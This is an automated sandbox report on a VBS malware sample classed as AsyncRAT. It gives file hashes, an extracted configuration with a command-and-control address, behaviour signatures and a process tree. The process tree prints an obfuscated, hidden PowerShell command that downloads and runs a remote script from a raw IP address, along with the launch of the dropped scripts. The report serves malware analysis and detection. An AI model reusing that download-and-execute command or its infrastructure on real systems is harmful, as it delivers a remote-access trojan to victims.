Overview

overview

10

Static

static

1

4f90acd842...8c.vbs

windows7-x64

8

4f90acd842...8c.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/01/2025, 02:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs

  • Size

    6KB

  • MD5

    5cd058a830624c948fcf2e91589e523c

  • SHA1

    f3ff01a26d55f8c01dc6d930afc526653164e2fd

  • SHA256

    4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c

  • SHA512

    786773fd9d87fa23680cface7236c349b560c7ad4241624f91a6fd6d6cfc05d7e554555614b93a78a2be8000b2c4e5c1b1fca9a312bd68a77cbab1b38ff23370

  • SSDEEP

    96:ej/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/Eb/3:8PjGZOmya03D

Score
10/10
asyncrat00000001discoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

C2

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f90acd8429781753e1b43f7c32efaa4ddc9fc108eaec01d9d1dd4ddc444208c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$FmxQdSlWaGye='IeX(NeW-OBJeCT NeT.W';$KtWLqHZBjFgp='eBCLIeNT).DOWNLO';$UeivQcqgkxEH='repoooos(''http://45.88.186.162/test//update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($FmxQdSlWaGye+$KtWLqHZBjFgp+$UeivQcqgkxEH);
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3732
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Public\Music\Ib1Gys4epo.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Windows\System32\net.exe
      "C:\Windows\System32\net.exe" session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3344
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\Ib1Gys4epo.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\Ib1Gys4epo.ps1'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1540
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2364
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\Music\Ib1Gys4epo.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Windows\System32\net.exe
        "C:\Windows\System32\net.exe" session
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          3⤵
            PID:2100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\Ib1Gys4epo.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\Ib1Gys4epo.ps1'"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1792
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
                PID:3632
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3720

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          f41839a3fe2888c8b3050197bc9a0a05

          SHA1

          0798941aaf7a53a11ea9ed589752890aee069729

          SHA256

          224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

          SHA512

          2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          b29d1cb3e9761a90902c4a66a2ba3d5a

          SHA1

          63c64b29626976bc0a143d72f291bb50727dffbe

          SHA256

          b998ed3cf206c4dac06d6028943a2f5accd73a93aca74420afe7480c464bf124

          SHA512

          54bac9ee28a46f57bfac8fecb6d8af504cb483b70f62f06febd9768d4254b611a082c8191d93599ebfd4a5b75a85dd387b758db1439df89337473c8f68a3cd88

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djtxxcyi.3fl.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Public\Music\Ib1Gys4epo.bat
          Filesize

          2KB

          MD5

          2e065e7218829a163058fa097845dba2

          SHA1

          aa6c63b9317f723389f550c433839ee136dd26ae

          SHA256

          febb766116ce6cf0462bf23060b82a8cdf67591dd5b90a22bef4cd1f7c2f4f03

          SHA512

          afb85022f0dbcecfbe8d17b65f99f5482e512be901e1f9c156cbdb962c5aa7ea8649ae2cbe976da27471e683b1b54fffbdd403c908b6608aa1e797da4926c519

          Download Submit

        • C:\Users\Public\Music\Ib1Gys4epo.ps1
          Filesize

          453KB

          MD5

          d8502dea3a910acdb3e942e4f368c060

          SHA1

          17dd9d6ce7114818a3aaeecb9956fd4a93a94236

          SHA256

          82106190d1a2850bde87107b6f76b2d68f2d5dc8211bd709f59158737fb42147

          SHA512

          8318b7d3541a98ae618b581aee6b791355a6b6ec928ffb2563bf71affe3635c8c76a44535f0f8eda82db0a53660ad31a052b44b659ddbf80f144e2bc813a83d5

          Download Submit

        • C:\Users\Public\Music\Ib1Gys4epo.vbs
          Filesize

          4KB

          MD5

          950ade446d464d618930a2b4f5e978cf

          SHA1

          7851452ce536e8a416ba4cbb540168a622930d2c

          SHA256

          d799db5accfbf6d8cab01f9e749187e155fa1598bcc381d622bfc3f3b4244e73

          SHA512

          0ff54c81a232932be47d07f64f1049cdf38fa0343a1ee2a1dc78f6c309721ca495330fd73fa5bda5fa3a3c1d835b93b20010ad21bba758b8e55f1c57d7ff3b24

          Download Submit

        • memory/1540-33-0x000001CB674E0000-0x000001CB674EC000-memory.dmp

          Filesize

          48KB

          Download

        • memory/2364-39-0x0000000005660000-0x000000000566A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2364-38-0x00000000056A0000-0x0000000005732000-memory.dmp

          Filesize

          584KB

          Download

        • memory/2364-37-0x0000000005A70000-0x0000000006014000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2364-34-0x0000000000400000-0x0000000000416000-memory.dmp

          Filesize

          88KB

          Download

        • memory/3732-18-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3732-32-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3732-31-0x00007FF9184C3000-0x00007FF9184C5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3732-0-0x00007FF9184C3000-0x00007FF9184C5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3732-12-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3732-40-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3732-41-0x0000025F80120000-0x0000025F802E2000-memory.dmp

          Filesize

          1.8MB

          Download

        • memory/3732-42-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3732-43-0x0000025F006B0000-0x0000025F00BD8000-memory.dmp

          Filesize

          5.2MB

          Download

        • memory/3732-11-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3732-1-0x0000025F7F2D0000-0x0000025F7F2F2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3732-47-0x00007FF9184C0000-0x00007FF918F81000-memory.dmp

          Filesize

          10.8MB

          Download